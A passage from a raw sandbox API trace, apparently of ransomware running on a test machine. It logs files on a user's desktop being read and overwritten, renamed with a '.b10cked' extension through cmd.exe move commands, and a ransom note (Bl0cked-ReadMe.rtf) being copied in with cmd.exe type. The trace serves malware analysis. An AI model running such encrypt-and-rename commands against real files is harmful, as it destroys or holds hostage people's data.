| out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5210 [0223.993] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x520e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x520e, lpOverlapped=0x0) returned 1 [0223.994] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-21006, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5210 [0223.994] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x520e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x520e, lpOverlapped=0x0) returned 1 [0223.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WtCCLcHrwK.wav", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0223.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WtCCLcHrwK.wav", cchWideChar=14, lpMultiByteStr=0x131322c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WtCCLcHrwK.wav", lpUsedDefaultChar=0x0) returned 14 [0223.998] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa41e [0223.998] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0223.998] CloseHandle (hObject=0x1b4) returned 1 [0223.999] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV") returned 0x2a [0223.999] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0224.000] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WTCCLC~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\WtCCLcHrwK.wav.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x15c, dwThreadId=0xee4)) returned 1 [0224.001] CloseHandle (hObject=0x120) returned 1 [0224.001] CloseHandle (hObject=0x1b4) returned 1 [0224.001] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.001] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0224.001] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount2=46) returned 1 [0224.001] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.001] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.001] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount1=30, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0224.001] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0224.002] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0224.002] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0224.002] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\") returned 0x1e [0224.002] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0224.002] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0224.002] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x128, dwThreadId=0x12c)) returned 1 [0224.007] CloseHandle (hObject=0x120) returned 1 [0224.007] CloseHandle (hObject=0x1b4) returned 1 [0224.007] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bl0cked-readme.rtf")) returned 0x20 [0224.007] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0224.007] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0224.007] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0224.007] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.008] ReleaseMutex (hMutex=0xf8) returned 1 [0224.008] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.008] ReleaseMutex (hMutex=0xf8) returned 1 [0224.008] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.008] ReleaseMutex (hMutex=0xf8) returned 1 [0224.008] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.008] ReleaseMutex (hMutex=0xf8) returned 1 [0224.008] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gcap-7-i61tx.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0224.008] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.008] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.008] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.008] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28079839232) returned 1 [0224.009] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.054] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x567d [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.055] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x5195 [0224.055] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0224.056] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0224.056] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x567d [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x567d [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.057] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2b3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2b3d, lpOverlapped=0x0) returned 1 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0224.057] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x2b3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x2b3d, lpOverlapped=0x0) returned 1 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-11069, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x2b40 [0224.057] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2b3d, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2b3d, lpOverlapped=0x0) returned 1 [0224.057] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-11069, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x2b40 [0224.057] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x2b3d, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x2b3d, lpOverlapped=0x0) returned 1 [0224.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gcAp-7-i61tX.bmp", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0224.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gcAp-7-i61tX.bmp", cchWideChar=16, lpMultiByteStr=0x13286a4, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gcAp-7-i61tX.bmp", lpUsedDefaultChar=0x0) returned 16 [0224.061] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x567d [0224.061] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0224.062] CloseHandle (hObject=0x1b4) returned 1 [0224.062] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP") returned 0x25 [0224.063] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\") returned 0x19 [0224.063] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GCAP-7~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\gcAp-7-i61tX.bmp.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xeac, dwThreadId=0x6fc)) returned 1 [0224.064] CloseHandle (hObject=0x120) returned 1 [0224.064] CloseHandle (hObject=0x1b4) returned 1 [0224.064] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.064] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\", cchLength=0x1e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\") returned 0x1e [0224.065] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\", cchCount2=30) returned 1 [0224.065] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.065] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0224.065] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount1=25, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 2 [0224.065] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.065] ReleaseMutex (hMutex=0xf8) returned 1 [0224.065] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.065] ReleaseMutex (hMutex=0xf8) returned 1 [0224.065] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.065] ReleaseMutex (hMutex=0xf8) returned 1 [0224.065] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0224.065] ReleaseMutex (hMutex=0xf8) returned 1 [0224.065] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\kawGr8UmxCuLrfZA.swf" (normalized: "c:\\users\\eebsym5\\desktop\\kawgr8umxculrfza.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=28085439913) returned 1 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.065] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8d4 [0224.066] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 